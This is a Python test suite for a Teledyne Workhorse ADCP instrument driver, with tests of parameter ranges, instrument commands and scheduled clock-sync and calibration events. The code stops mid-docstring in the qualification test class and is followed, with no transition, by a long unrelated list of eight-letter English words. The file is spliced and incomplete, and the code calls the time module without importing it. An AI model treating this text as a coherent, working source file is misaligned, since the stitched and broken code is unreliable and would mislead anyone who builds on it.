from mi.core.time import get_timestamp_delayed
from nose.plugins.attrib import attr
from mock import Mock
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_driver import DriverEvent
from mi.core.log import get_logger; log = get_logger()
# MI imports.
from mi.idk.unit_test import AgentCapabilityType
from mi.idk.unit_test import InstrumentDriverTestCase
from mi.idk.unit_test import InstrumentDriverUnitTestCase
from mi.idk.unit_test import InstrumentDriverIntegrationTestCase
from mi.idk.unit_test import InstrumentDriverQualificationTestCase
from mi.idk.unit_test import ParameterTestConfigKey
from mi.idk.unit_test import DriverStartupConfigKey
from mi.instrument.teledyne.test.test_driver import TeledyneUnitTest
from mi.instrument.teledyne.test.test_driver import TeledyneIntegrationTest
from mi.instrument.teledyne.test.test_driver import TeledyneQualificationTest
from mi.instrument.teledyne.test.test_driver import TeledynePublicationTest
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import WorkhorseInstrumentDriver
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import DataParticleType
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import TeledyneProtocolState
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import TeledyneProtocolEvent
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import WorkhorseParameter
from mi.instrument.teledyne.driver import TeledyneScheduledJob
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import TeledynePrompt
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import NEWLINE
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_SYSTEM_CONFIGURATION_KEY
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_SYSTEM_CONFIGURATION_DataParticle
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_COMPASS_CALIBRATION_KEY
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_COMPASS_CALIBRATION_DataParticle
#from mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_data import PS3_RAW_DATA
#from mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_data import FD_RAW_DATA
#from mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_data import PT200_RAW_DATA
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentStateException
from mi.core.exceptions import InstrumentCommandException
from pyon.core.exception import Conflict
from pyon.agent.agent import ResourceAgentEvent
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import ResourceAgentState
from random import randint
from mi.idk.unit_test import AGENT_DISCOVER_TIMEOUT
from mi.idk.unit_test import GO_ACTIVE_TIMEOUT
from mi.idk.unit_test import GET_TIMEOUT
from mi.idk.unit_test import SET_TIMEOUT
from mi.idk.unit_test import EXECUTE_TIMEOUT
#################################### RULES ####################################
# #
# Common capabilities in the base class #
# #
# Instrument specific stuff in the derived class #
# #
# Generator spits out either stubs or comments describing test this here, #
# test that there. #
# #
# Qualification tests are driven through the instrument_agent #
# #
###############################################################################
class WorkhorseParameterAltValue():
# Values that are valid, but not the ones we want to use,
# used for testing to verify that we are setting good values.
#
# Probably best NOT to tweek this one.
SERIAL_FLOW_CONTROL = '11110'
BANNER = 1
SAVE_NVRAM_TO_RECORDER = True # Immutable.
SLEEP_ENABLE = 1
POLLED_MODE = True
PITCH = 1
ROLL = 1
###############################################################################
# UNIT TESTS #
###############################################################################
@attr('UNIT', group='mi')
class WorkhorseDriverUnitTest(TeledyneUnitTest):
def setUp(self):
TeledyneUnitTest.setUp(self)
###############################################################################
# INTEGRATION TESTS #
###############################################################################
@attr('INT', group='mi')
class WorkhorseDriverIntegrationTest(TeledyneIntegrationTest):
def setUp(self):
TeledyneIntegrationTest.setUp(self)
"""
for k in self._driver_parameters.keys():
if self.VALUE in self._driver_parameters[k]:
if self._driver_parameters[k][self.READONLY] == False:
self._driver_parameter_defaults[k] = self._driver_parameters[k][self.VALUE]
"""
###
# Add instrument specific integration tests
###
def test_parameters(self):
"""
Test driver parameters and verify their type. Startup parameters also verify the parameter
value. This test confirms that parameters are being read/converted properly and that
the startup has been applied.
"""
self.assert_initialize_driver()
reply = self.driver_client.cmd_dvr('get_resource', WorkhorseParameter.ALL)
self.assert_driver_parameters(reply, True)
def test_commands(self):
"""
Run instrument commands from both command and streaming mode.
"""
self.assert_initialize_driver()
####
# First test in command mode
####
self.assert_driver_command(TeledyneProtocolEvent.START_AUTOSAMPLE, state=TeledyneProtocolState.AUTOSAMPLE, delay=1)
self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE, state=TeledyneProtocolState.COMMAND, delay=1)
self.assert_driver_command(TeledyneProtocolEvent.GET_CALIBRATION)
self.assert_driver_command(TeledyneProtocolEvent.GET_CONFIGURATION)
self.assert_driver_command(TeledyneProtocolEvent.CLOCK_SYNC)
self.assert_driver_command(TeledyneProtocolEvent.SCHEDULED_CLOCK_SYNC)
self.assert_driver_command(TeledyneProtocolEvent.SEND_LAST_SAMPLE, regex='^\x7f\x7f.*')
self.assert_driver_command(TeledyneProtocolEvent.SAVE_SETUP_TO_RAM, expected="Parameters saved as USER defaults")
self.assert_driver_command(TeledyneProtocolEvent.GET_ERROR_STATUS_WORD, regex='^........')
self.assert_driver_command(TeledyneProtocolEvent.CLEAR_ERROR_STATUS_WORD, regex='^Error Status Word Cleared')
self.assert_driver_command(TeledyneProtocolEvent.GET_FAULT_LOG, regex='^Total Unique Faults =.*')
self.assert_driver_command(TeledyneProtocolEvent.CLEAR_FAULT_LOG, expected='FC ..........\r\n Fault Log Cleared.\r\nClearing buffer @0x00801000\r\nDone [i=2048].\r\n')
self.assert_driver_command(TeledyneProtocolEvent.GET_INSTRUMENT_TRANSFORM_MATRIX, regex='^Beam Width:')
self.assert_driver_command(TeledyneProtocolEvent.RUN_TEST_200, regex='^ Ambient Temperature =')
####
# Test in streaming mode
####
# Put us in streaming
self.assert_driver_command(TeledyneProtocolEvent.START_AUTOSAMPLE, state=TeledyneProtocolState.AUTOSAMPLE, delay=1)
self.assert_driver_command_exception(TeledyneProtocolEvent.SEND_LAST_SAMPLE, exception_class=InstrumentCommandException)
self.assert_driver_command_exception(TeledyneProtocolEvent.SAVE_SETUP_TO_RAM, exception_class=InstrumentCommandException)
self.assert_driver_command_exception(TeledyneProtocolEvent.GET_ERROR_STATUS_WORD, exception_class=InstrumentCommandException)
self.assert_driver_command_exception(TeledyneProtocolEvent.CLEAR_ERROR_STATUS_WORD, exception_class=InstrumentCommandException)
self.assert_driver_command_exception(TeledyneProtocolEvent.GET_FAULT_LOG, exception_class=InstrumentCommandException)
self.assert_driver_command_exception(TeledyneProtocolEvent.CLEAR_FAULT_LOG, exception_class=InstrumentCommandException)
self.assert_driver_command_exception(TeledyneProtocolEvent.GET_INSTRUMENT_TRANSFORM_MATRIX, exception_class=InstrumentCommandException)
self.assert_driver_command_exception(TeledyneProtocolEvent.RUN_TEST_200, exception_class=InstrumentCommandException)
self.assert_driver_command(TeledyneProtocolEvent.SCHEDULED_CLOCK_SYNC)
self.assert_driver_command_exception(TeledyneProtocolEvent.CLOCK_SYNC, exception_class=InstrumentCommandException)
self.assert_driver_command(TeledyneProtocolEvent.GET_CALIBRATION, regex=r'Calibration date and time:')
self.assert_driver_command(TeledyneProtocolEvent.GET_CONFIGURATION, regex=r' Instrument S/N')
self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE, state=TeledyneProtocolState.COMMAND, delay=1)
####
# Test a bad command
####
self.assert_driver_command_exception('ima_bad_command', exception_class=InstrumentCommandException)
def test_startup_params(self):
"""
Verify that startup parameters are applied correctly. Generally this
happens in the driver discovery method.
since nose orders the tests by ascii value this should run first.
"""
self.assert_initialize_driver()
get_values = {
WorkhorseParameter.SERIAL_FLOW_CONTROL: '11110',
WorkhorseParameter.BANNER: False,
WorkhorseParameter.INSTRUMENT_ID: 0,
WorkhorseParameter.SLEEP_ENABLE: 0,
WorkhorseParameter.SAVE_NVRAM_TO_RECORDER: True,
WorkhorseParameter.POLLED_MODE: False,
WorkhorseParameter.XMIT_POWER: 255,
WorkhorseParameter.SPEED_OF_SOUND: 1485,
WorkhorseParameter.PITCH: 0,
WorkhorseParameter.ROLL: 0,
WorkhorseParameter.SALINITY: 35,
WorkhorseParameter.TIME_PER_ENSEMBLE: '00:00:00.00',
WorkhorseParameter.TIME_PER_PING: '00:01.00',
WorkhorseParameter.FALSE_TARGET_THRESHOLD: '050,001',
WorkhorseParameter.BANDWIDTH_CONTROL: 0,
WorkhorseParameter.CORRELATION_THRESHOLD: 64,
WorkhorseParameter.SERIAL_OUT_FW_SWITCHES: '111100000',
WorkhorseParameter.ERROR_VELOCITY_THRESHOLD: 2000,
WorkhorseParameter.BLANK_AFTER_TRANSMIT: 704,
WorkhorseParameter.CLIP_DATA_PAST_BOTTOM: 0,
WorkhorseParameter.RECEIVER_GAIN_SELECT: 1,
WorkhorseParameter.WATER_REFERENCE_LAYER: '001,005',
WorkhorseParameter.WATER_PROFILING_MODE: 1,
WorkhorseParameter.NUMBER_OF_DEPTH_CELLS: 100,
WorkhorseParameter.PINGS_PER_ENSEMBLE: 1,
WorkhorseParameter.DEPTH_CELL_SIZE: 800,
WorkhorseParameter.TRANSMIT_LENGTH: 0,
WorkhorseParameter.PING_WEIGHT: 0,
WorkhorseParameter.AMBIGUITY_VELOCITY: 175,
}
# Change the values of these parameters to something before the
# driver is reinitalized. They should be blown away on reinit.
new_values = {}
p = WorkhorseParameter.dict()
for k, v in WorkhorseParameterAltValue.dict().items():
if k not in ('BANNER', 'SERIAL_FLOW_CONTROL', 'SAVE_NVRAM_TO_RECORDER'):
new_values[p[k]] = v
self.assert_startup_parameters(self.assert_driver_parameters, new_values, get_values)
###
# Test scheduled events
###
def assert_compass_calibration(self):
"""
Verify a calibration particle was generated
"""
self.clear_events()
self.assert_async_particle_generation(DataParticleType.ADCP_COMPASS_CALIBRATION, self.assert_particle_compass_calibration, timeout=120)
def test_scheduled_compass_calibration_command(self):
"""
Verify the device configuration command can be triggered and run in command
"""
self.assert_scheduled_event(TeledyneScheduledJob.GET_CALIBRATION, self.assert_compass_calibration, delay=100)
self.assert_current_state(TeledyneProtocolState.COMMAND)
def test_scheduled_compass_calibration_autosample(self):
"""
Verify the device configuration command can be triggered and run in autosample
"""
self.assert_scheduled_event(TeledyneScheduledJob.GET_CALIBRATION, self.assert_compass_calibration, delay=100,
autosample_command=TeledyneProtocolEvent.START_AUTOSAMPLE)
self.assert_current_state(TeledyneProtocolState.AUTOSAMPLE)
self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE)
def assert_acquire_status(self):
"""
Verify a status particle was generated
"""
self.clear_events()
self.assert_async_particle_generation(DataParticleType.ADCP_SYSTEM_CONFIGURATION, self.assert_particle_system_configuration, timeout=120)
def test_scheduled_device_configuration_command(self):
"""
Verify the device status command can be triggered and run in command
"""
self.assert_scheduled_event(TeledyneScheduledJob.GET_CONFIGURATION, self.assert_acquire_status, delay=100)
self.assert_current_state(TeledyneProtocolState.COMMAND)
def test_scheduled_device_configuration_autosample(self):
"""
Verify the device status command can be triggered and run in autosample
"""
self.assert_scheduled_event(TeledyneScheduledJob.GET_CONFIGURATION, self.assert_acquire_status,
autosample_command=TeledyneProtocolEvent.START_AUTOSAMPLE, delay=100)
self.assert_current_state(TeledyneProtocolState.AUTOSAMPLE)
time.sleep(5)
self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE)
def assert_clock_sync(self):
"""
Verify the clock is set to at least the current date
"""
dt = self.assert_get(WorkhorseParameter.TIME)
lt = time.strftime("%Y/%m/%d,%H:%M:%S", time.gmtime(time.mktime(time.localtime())))
self.assertTrue(lt[:13].upper() in dt.upper())
def test_scheduled_clock_sync_command(self):
"""
Verify the scheduled clock sync is triggered and functions as expected
"""
self.assert_scheduled_event(TeledyneScheduledJob.CLOCK_SYNC, self.assert_clock_sync, delay=90)
self.assert_current_state(TeledyneProtocolState.COMMAND)
def test_scheduled_clock_sync_autosample(self):
"""
Verify the scheduled clock sync is triggered and functions as expected
"""
self.assert_scheduled_event(TeledyneScheduledJob.CLOCK_SYNC, self.assert_clock_sync,
autosample_command=TeledyneProtocolEvent.START_AUTOSAMPLE, delay=200)
self.assert_current_state(TeledyneProtocolState.AUTOSAMPLE)
self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE)
def _test_set_serial_flow_control_readonly(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for SERIAL_FLOW_CONTROL ======")
# Test read only raise exceptions on set.
self.assert_set_exception(WorkhorseParameter.SERIAL_FLOW_CONTROL, '10110')
self._tested[WorkhorseParameter.SERIAL_FLOW_CONTROL] = True
def _test_set_save_nvram_to_recorder_readonly(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for SAVE_NVRAM_TO_RECORDER ======")
# Test read only raise exceptions on set.
self.assert_set_exception(WorkhorseParameter.SAVE_NVRAM_TO_RECORDER, False)
self._tested[WorkhorseParameter.SAVE_NVRAM_TO_RECORDER] = True
def _test_set_banner_readonly(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for BANNER ======")
# Test read only raise exceptions on set.
self.assert_set_exception(WorkhorseParameter.BANNER, True)
self._tested[WorkhorseParameter.BANNER] = True
def _test_set_pitch(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for PITCH ======")
# PITCH: -- Int -6000 to 6000
self.assert_set(WorkhorseParameter.PITCH, -6000)
self.assert_set(WorkhorseParameter.PITCH, -4000)
self.assert_set(WorkhorseParameter.PITCH, -2000)
self.assert_set(WorkhorseParameter.PITCH, -1)
self.assert_set(WorkhorseParameter.PITCH, 0)
self.assert_set(WorkhorseParameter.PITCH, 1)
self.assert_set(WorkhorseParameter.PITCH, 2000)
self.assert_set(WorkhorseParameter.PITCH, 4000)
self.assert_set(WorkhorseParameter.PITCH, 6000)
self.assert_set_exception(WorkhorseParameter.PITCH, "LEROY JENKINS")
self.assert_set_exception(WorkhorseParameter.PITCH, -6001)
self.assert_set_exception(WorkhorseParameter.PITCH, 6001)
self.assert_set_exception(WorkhorseParameter.PITCH, 3.1415926)
#
# Reset to good value.
#
#self.assert_set(WorkhorseParameter.PITCH, self._driver_parameter_defaults[WorkhorseParameter.PITCH])
self.assert_set(WorkhorseParameter.PITCH, self._driver_parameters[WorkhorseParameter.PITCH][self.VALUE])
self._tested[WorkhorseParameter.PITCH] = True
def _test_set_roll(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for ROLL ======")
# ROLL: -- Int -6000 to 6000
self.assert_set(WorkhorseParameter.ROLL, -6000)
self.assert_set(WorkhorseParameter.ROLL, -4000)
self.assert_set(WorkhorseParameter.ROLL, -2000)
self.assert_set(WorkhorseParameter.ROLL, -1)
self.assert_set(WorkhorseParameter.ROLL, 0)
self.assert_set(WorkhorseParameter.ROLL, 1)
self.assert_set(WorkhorseParameter.ROLL, 2000)
self.assert_set(WorkhorseParameter.ROLL, 4000)
self.assert_set(WorkhorseParameter.ROLL, 6000)
self.assert_set_exception(WorkhorseParameter.ROLL, "LEROY JENKINS")
self.assert_set_exception(WorkhorseParameter.ROLL, -6001)
self.assert_set_exception(WorkhorseParameter.ROLL, 6001)
self.assert_set_exception(WorkhorseParameter.ROLL, 3.1415926)
#
# Reset to good value.
#
#self.assert_set(WorkhorseParameter.ROLL, self._driver_parameter_defaults[WorkhorseParameter.ROLL])
self.assert_set(WorkhorseParameter.ROLL, self._driver_parameters[WorkhorseParameter.ROLL][self.VALUE])
self._tested[WorkhorseParameter.ROLL] = True
def _test_set_polled_mode(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for POLLED_MODE ======")
# POLLED_MODE: -- (True/False)
self.assert_set(WorkhorseParameter.POLLED_MODE, True)
self.assert_set_exception(WorkhorseParameter.POLLED_MODE, "LEROY JENKINS")
#
# Reset to good value.
#
#self.assert_set(WorkhorseParameter.POLLED_MODE, self._driver_parameter_defaults[WorkhorseParameter.POLLED_MODE])
self.assert_set(WorkhorseParameter.POLLED_MODE, self._driver_parameters[WorkhorseParameter.POLLED_MODE][self.VALUE])
self._tested[WorkhorseParameter.POLLED_MODE] = True
def _test_set_sleep_enable(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for SLEEP_ENABLE ======")
# SLEEP_ENABLE: -- (0,1,2)
self.assert_set(WorkhorseParameter.SLEEP_ENABLE, 1)
self.assert_set(WorkhorseParameter.SLEEP_ENABLE, 2)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, -1)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, 3)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, 3.1415926)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, "LEROY JENKINS")
#
# Reset to good value.
#
#self.assert_set(WorkhorseParameter.SLEEP_ENABLE, self._driver_parameter_defaults[WorkhorseParameter.SLEEP_ENABLE])
self.assert_set(WorkhorseParameter.SLEEP_ENABLE, self._driver_parameters[WorkhorseParameter.SLEEP_ENABLE][self.VALUE])
self._tested[WorkhorseParameter.SLEEP_ENABLE] = True
def _test_set_coordinate_transformation(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for COORDINATE_TRANSFORMATION ======")
# COORDINATE_TRANSFORMATION: -- (5 bits 0 or 1)
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '11000')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '11111')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '11101')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '00000')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '00111')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '00101')
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, -1)
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, 3)
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, 3.1415926)
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, "LEROY JENKINS")
#
# Reset to good value.
#
#self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, self._driver_parameter_defaults[WorkhorseParameter.COORDINATE_TRANSFORMATION])
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, self._driver_parameters[WorkhorseParameter.COORDINATE_TRANSFORMATION][self.VALUE])
self._tested[WorkhorseParameter.COORDINATE_TRANSFORMATION] = True
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for doing final testing of ion #
# integration. The generally aren't used for instrument debugging and should #
# be tackled after all unit and integration tests are complete #
###############################################################################
@attr('QUAL', group='mi')
class WorkhorseDriverQualificationTest(TeledyneQualificationTest):
def setUp(self):
TeledyneQualificationTest.setUp(self)
def assert_configuration(self, data_particle, verify_values = False):
'''
Verify assert_compass_calibration particle
@param data_particle: ADCP_COMPASS_CALIBRATION data particle
@param verify_values: bool, should we verify parameter values
'''
self.assert_data_particle_keys(ADCP_SYSTEM_CONFIGURATION_KEY, self._system_configuration_data_parameters)
self.assert_data_particle_header(data_particle, DataParticleType.ADCP_SYSTEM_CONFIGURATION)
self.assert_data_particle_parameters(data_particle, self._system_configuration_data_parameters, verify_values)
def assert_compass_calibration(self, data_particle, verify_values = False):
'''
Verify assert_compass_calibration particle
@param data_particle: ADCP_COMPASS_CALIBRATION data particle
@param verify_values: bool, | |
"disseise",
"disseize",
"dissents",
"disserts",
"disserve",
"dissever",
"distaffs",
"distains",
"distally",
"distaves",
"distends",
"distichs",
"distills",
"distomes",
"distrain",
"distrait",
"disulfid",
"disunion",
"disunite",
"disunity",
"disusing",
"disvalue",
"disyoked",
"disyokes",
"ditchers",
"ditheism",
"ditheist",
"dithered",
"ditherer",
"ditsiest",
"dittoing",
"ditziest",
"diureses",
"diuresis",
"diurnals",
"divagate",
"divebomb",
"dividual",
"diviners",
"divinest",
"divinise",
"divinize",
"divorcee",
"divorcer",
"divulger",
"divulges",
"divulsed",
"divulses",
"divvying",
"dizening",
"dizygous",
"dizziest",
"djellaba",
"doblones",
"docilely",
"docility",
"dockages",
"dockhand",
"dockland",
"doctorly",
"doddered",
"dodderer",
"dodgiest",
"dodoisms",
"doeskins",
"dogbanes",
"dogberry",
"dogcarts",
"dogeared",
"dogedoms",
"dogeship",
"dogfaces",
"doggedly",
"doggerel",
"doggiest",
"doggoned",
"doggoner",
"doggones",
"doggrels",
"dognaped",
"dognaper",
"dogsbody",
"dogsleds",
"dogteeth",
"dogtooth",
"dogtrots",
"dogvanes",
"dogwatch",
"dogwoods",
"dolcetto",
"dolerite",
"dolesome",
"dolloped",
"dollying",
"dolmades",
"dolmenic",
"doloroso",
"dolorous",
"domelike",
"domicils",
"domineer",
"dominies",
"dominium",
"donative",
"donators",
"doneness",
"dongolas",
"donnered",
"donniker",
"doodlers",
"doodling",
"doofuses",
"doomiest",
"doomster",
"doorjamb",
"doorless",
"doornail",
"doorpost",
"doorsill",
"doorstop",
"dooryard",
"dopehead",
"dopester",
"dopiness",
"dorhawks",
"dorkiest",
"dormered",
"dormient",
"dormouse",
"dornecks",
"dornicks",
"dornocks",
"dorsally",
"dosseret",
"dotardly",
"dotation",
"dotingly",
"dotterel",
"dottiest",
"dottrels",
"doublers",
"doublets",
"doubloon",
"doublure",
"douceurs",
"douching",
"doughier",
"doupioni",
"dourines",
"dourness",
"douzeper",
"dovecote",
"dovecots",
"dovekeys",
"dovekies",
"dovelike",
"dovening",
"dowagers",
"dowdiest",
"dowdyish",
"doweling",
"dowelled",
"doweries",
"dowering",
"downbows",
"downcome",
"downhaul",
"downiest",
"downland",
"downless",
"downlike",
"downpipe",
"downspin",
"downtick",
"downtrod",
"downwash",
"downzone",
"dowsabel",
"doxology",
"doyennes",
"dozening",
"dozenths",
"doziness",
"drabbest",
"drabbets",
"drabbing",
"drabbled",
"drabbles",
"drabness",
"dracaena",
"dracenas",
"drachmae",
"drachmai",
"draconic",
"draffier",
"draffish",
"draftees",
"draftier",
"draftily",
"draggers",
"draggier",
"draggled",
"draggles",
"dragline",
"dragnets",
"dragoman",
"dragomen",
"dragonet",
"dragrope",
"drainers",
"dramming",
"drammock",
"dramshop",
"drapable",
"dratting",
"draughty",
"drawbars",
"drawbore",
"drawlers",
"drawlier",
"drawling",
"drawtube",
"drayages",
"dreamful",
"dreamier",
"dreamily",
"drearier",
"drearies",
"drearily",
"dredgers",
"dreggier",
"dreggish",
"dreidels",
"drencher",
"drenches",
"dressier",
"dressily",
"dribbing",
"dribbled",
"dribbler",
"dribbles",
"dribblet",
"driblets",
"driftage",
"driftier",
"driftpin",
"dripless",
"drippers",
"drippier",
"drippily",
"drivable",
"driveled",
"driveler",
"drivings",
"drizzles",
"drollery",
"drollest",
"drolling",
"dromonds",
"droolier",
"droopier",
"droopily",
"drophead",
"droppers",
"dropshot",
"dropsied",
"dropsies",
"dropwort",
"droseras",
"droskies",
"drossier",
"droughty",
"drouking",
"drownded",
"drowners",
"drowsier",
"drowsily",
"drowsing",
"drubbers",
"drubbing",
"drudgers",
"drudging",
"druggets",
"druggier",
"druggies",
"drugging",
"druggist",
"druidess",
"druidism",
"drumbled",
"drumbles",
"drumfire",
"drumfish",
"drumhead",
"drumlier",
"drumlike",
"drumlins",
"drumroll",
"drunkest",
"drupelet",
"druthers",
"drypoint",
"drystone",
"drywalls",
"drywells",
"dualisms",
"dualists",
"dualized",
"dualizes",
"dubbings",
"dubniums",
"dubonnet",
"duckbill",
"duckiest",
"duckpins",
"ducktail",
"duckwalk",
"duckweed",
"ductings",
"ductless",
"ductules",
"dudgeons",
"dudishly",
"duecento",
"duelists",
"duellers",
"duelling",
"duellist",
"duetting",
"duettist",
"dukedoms",
"dulcetly",
"dulciana",
"dulcinea",
"dullards",
"dumbcane",
"dumbhead",
"dumbness",
"dumfound",
"dummkopf",
"dummying",
"dumpcart",
"dumpiest",
"dumpings",
"dumpsite",
"duncical",
"duneland",
"dunelike",
"dungaree",
"dunghill",
"dungiest",
"dunnages",
"dunnites",
"duologue",
"duopsony",
"duotones",
"duperies",
"duplexed",
"duplexer",
"duramens",
"durances",
"durative",
"duresses",
"durmasts",
"durndest",
"durneder",
"duskiest",
"dustbins",
"dustheap",
"dustiest",
"dustings",
"dustless",
"dustlike",
"dustoffs",
"dustpans",
"dustrags",
"dutiable",
"duumviri",
"duumvirs",
"duvetine",
"duvetyne",
"duvetyns",
"duxelles",
"dwarfest",
"dwarfing",
"dwarfish",
"dwarfism",
"dweebier",
"dweebish",
"dwindles",
"dyarchic",
"dybbukim",
"dyestuff",
"dyeweeds",
"dyewoods",
"dynamist",
"dynatron",
"dysgenic",
"dyspepsy",
"dyspneal",
"dyspneas",
"dyspneic",
"dyspnoea",
"dyspnoic",
"dystaxia",
"dystocia",
"dystonic",
"dysurias",
"eagerest",
"eanlings",
"earaches",
"eardrops",
"eardrums",
"earflaps",
"earldoms",
"earlobes",
"earlocks",
"earlship",
"earmuffs",
"earnests",
"earshots",
"earstone",
"earthier",
"earthily",
"earthman",
"earthmen",
"earthnut",
"earthpea",
"earthset",
"earwaxes",
"earworms",
"eastings",
"eatables",
"ebonised",
"ebonises",
"ebonites",
"ebonized",
"ebonizes",
"ecaudate",
"ecbolics",
"ecdysial",
"ecdysone",
"ecdysons",
"ecesises",
"echelles",
"echidnae",
"echidnas",
"echinate",
"echinoid",
"echogram",
"echoisms",
"echoless",
"eclipser",
"eclipsis",
"eclogite",
"eclogues",
"eclosion",
"ecocidal",
"ecocides",
"ecofreak",
"econobox",
"ecotages",
"ecotonal",
"ecotones",
"ecotours",
"ecotypes",
"ecotypic",
"ecraseur",
"ectoderm",
"ectomere",
"ectopias",
"ectosarc",
"ectozoan",
"ectozoon",
"ecumenic",
"edacious",
"edentate",
"edgeless",
"edgeways",
"edgewise",
"edginess",
"edifices",
"edifiers",
"editress",
"educable",
"educible",
"eductive",
"eductors",
"eelgrass",
"eelpouts",
"eelworms",
"eeriness",
"effacers",
"effacing",
"effecter",
"effendis",
"effetely",
"effigial",
"effigies",
"effluvia",
"effluxes",
"effulged",
"effulges",
"effusing",
"effusive",
"eftsoons",
"egalites",
"egesting",
"egestion",
"egestive",
"eggfruit",
"eggheads",
"eglatere",
"eglomise",
"egoistic",
"egomania",
"egotisms",
"egotists",
"egressed",
"egresses",
"eidolons",
"eighthly",
"eightvos",
"einkorns",
"eisweins",
"ejective",
"ejectors",
"ekistics",
"ekpweles",
"ektexine",
"elaphine",
"elapsing",
"elastins",
"elatedly",
"elaterid",
"elaterin",
"elations",
"elatives",
"elbowing",
"electees",
"electros",
"electrum",
"elegancy",
"elegiacs",
"elegised",
"elegises",
"elegists",
"elegized",
"elegizes",
"elenchic",
"elenchus",
"elenctic",
"elfishly",
"elflocks",
"elicitor",
"elidible",
"eligibly",
"elisions",
"elitisms",
"elkhound",
"eloigned",
"eloigner",
"eloiners",
"eloining",
"elusions",
"elutions",
"eluviate",
"eluviums",
"elvishly",
"elytroid",
"elytrous",
"emaciate",
"emanator",
"embalmed",
"embalmer",
"embanked",
"embarred",
"embattle",
"embaying",
"embezzle",
"embitter",
"emblazed",
"emblazer",
"emblazes",
"emblazon",
"emblemed",
"embodier",
"embolden",
"embolies",
"emborder",
"embosked",
"embosoms",
"embosser",
"embosses",
"embowels",
"embowers",
"embowing",
"embracer",
"embroils",
"embrowns",
"embruing",
"embruted",
"embrutes",
"embryoid",
"embryons",
"emceeing",
"emdashes",
"emeerate",
"emendate",
"emenders",
"emending",
"emeritae",
"emeritas",
"emeroids",
"emersion",
"emetines",
"eminency",
"emissive",
"empalers",
"empaling",
"empanada",
"empanels",
"emperies",
"empirics",
"emplaced",
"emplaces",
"emplaned",
"emplanes",
"empoison",
"emprises",
"emprizes",
"emptiers",
"emptiest",
"emptings",
"empurple",
"empyemas",
"empyemic",
"empyreal",
"empyrean",
"emulsify",
"emulsive",
"emulsoid",
"enactive",
"enactors",
"enactory",
"enameler",
"enamines",
"enamours",
"enations",
"encaenia",
"encaging",
"encashed",
"encashes",
"encasing",
"enceinte",
"enchains",
"enchants",
"enchased",
"enchaser",
"enchases",
"enchoric",
"encipher",
"enclasps",
"enclaved",
"enclitic",
"encloser",
"encomium",
"encoring",
"encrusts",
"encyclic",
"encysted",
"endamage",
"endameba",
"endarchy",
"endashes",
"endbrain",
"endeared",
"endemial",
"endemics",
"endemism",
"endermic",
"endexine",
"endgames",
"enditing",
"endleafs",
"endocarp",
"endocast",
"endoderm",
"endogamy",
"endogens",
"endogeny",
"endopods",
"endorsee",
"endorser",
"endorsor",
"endosarc",
"endosmos",
"endosome",
"endostea",
"endowers",
"endowing",
"endozoic",
"endplate",
"endplays",
"endurers",
"energids",
"enervate",
"enfacing",
"enfeeble",
"enfeoffs",
"enfetter",
"enfevers",
"enfilade",
"enflamed",
"enflames",
"enfolded",
"enfolder",
"enframed",
"enframes",
"engagers",
"engilded",
"enginery",
"engining",
"enginous",
"engirded",
"engirdle",
"engorges",
"engrafts",
"engrails",
"engrains",
"engramme",
"engraves",
"enhaloed",
"enhaloes",
"enigmata",
"enisling",
"enjambed",
"enjoiner",
"enjoyers",
"enkindle",
"enlacing",
"enlistee",
"enlister",
"enlivens",
"enmeshed",
"enmeshes",
"enmities",
"enneadic",
"enneagon",
"ennobled",
"ennobler",
"ennobles",
"enolases",
"enophile",
"enosises",
"enounced",
"enounces",
"enplaned",
"enplanes",
"enraging",
"enravish",
"enricher",
"enrobers",
"enrobing",
"enroller",
"enrooted",
